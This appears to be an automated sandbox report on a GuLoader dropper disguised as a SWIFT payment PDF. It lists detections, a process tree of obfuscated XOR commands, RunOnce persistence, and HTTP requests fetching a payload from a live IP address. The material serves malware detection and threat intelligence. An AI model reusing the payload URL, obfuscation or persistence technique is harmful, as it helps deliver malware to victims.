

Windows Analysis Report
SWIFTCOPYMT1030000000_pdf.exe

Overview

General Information

Sample name: SWIFTCOPYMT1030000000_pdf.exe
Analysis ID: 1432107
MD5: 1048340bcfae30df032c161ac52f8f0e
SHA1: 8a3370d01a170626ef43202f5fe54e27372abec4
SHA256: 47a75ba2cc69f372c816fb61d079ebe6e3a81eeeb16e72726725b088a59f4e94

Detection

GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Mass process execution to delay analysis
Obfuscated command line found
Sigma detected: New RUN Key Pointing to Suspicious Folder
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Sigma detected: CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • SWIFTCOPYMT1030000000_pdf.exe (PID: 1976 cmdline: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe" MD5: 1048340BCFAE30DF032C161AC52F8F0E)
    • cmd.exe (PID: 6920 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 616 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 452 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8032 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 528 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2500 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5196 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5592 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3608 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6920 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 616 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 452 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8032 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5272 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6584 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5456 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7444 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4916 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1244 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2036 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5688 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1500 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2940 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1564 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7048 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 840 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2300 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7808 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5804 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1572 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2500 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6964 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4768 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6284 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5696 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7424 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4972 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2632 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5376 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5100 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2036 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5688 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3204 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1608 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4404 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7012 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3308 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6056 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2424 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1784 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4972 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2632 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1728 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5100 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5700 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4212 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6416 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7372 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6512 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • SWIFTCOPYMT1030000000_pdf.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe" MD5: 1048340BCFAE30DF032C161AC52F8F0E)
      • WerFault.exe (PID: 3228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.134274135976.0000000000863000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
00000006.00000002.134274135976.000000000081E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
00000006.00000002.134275655794.00000000085F6000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: SWIFTCOPYMT1030000000_pdf.exe PID: 1976 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe, ProcessId: 1268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Blankbook
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe, ProcessId: 1268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Blankbook
No Snort rule has matched


AV Detection

Source: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe | ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe | Virustotal: Detection: 36%
Source: SWIFTCOPYMT1030000000_pdf.exe | ReversingLabs: Detection: 15%
Source: SWIFTCOPYMT1030000000_pdf.exe | Virustotal: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe | Joe Sandbox ML: detected
Source: SWIFTCOPYMT1030000000_pdf.exe | Joe Sandbox ML: detected
Source: SWIFTCOPYMT1030000000_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 6_2_00405454 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 6_2_00405454
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 6_2_00405E7B FindFirstFileA,FindClose | 6_2_00405E7B
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 6_2_0040264F FindFirstFileA | 6_2_0040264F
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 136_2_0040264F FindFirstFileA | 136_2_0040264F
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 136_2_00405454 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 136_2_00405454
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 136_2_00405E7B FindFirstFileA,FindClose | 136_2_00405E7B
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File opened: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File opened: C:\Users\user\udskriftskartotek\chiromancy\refalling\Nonessential\Uforstaaeligheds.Com
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | File opened: C:\Users\user\AppData
Source: global traffic | HTTP traffic detected: GET /yFtqL16.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 94.156.8.104 | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 94.156.8.104 (entry repeated 50 times)
Source: global traffic | HTTP traffic detected: GET /yFtqL16.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 94.156.8.104 | Cache-Control: no-cache
Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134625856432.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134626594503.0000000009280000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://94.156.8.104/yFtqL16.bin
Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134626594503.0000000009280000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://94.156.8.104/yFtqL16.binApokOpt103.78.0.98/yFtqL16.bin
Source: SWIFTCOPYMT1030000000_pdf.exe, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SWIFTCOPYMT1030000000_pdf.exe, 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000006.00000000.133684224870.0000000000409000.00000008.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Code function: 6_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard | 6_2_00404FC2
Source: Conhost.exe | Process created: 93

          System Summary

          barindex
          Source: initial sampleStatic PE information: Filename: SWIFTCOPYMT1030000000_pdf.exe
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_004030EF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,6_2_004030EF
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_00403188 CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,136_2_00403188
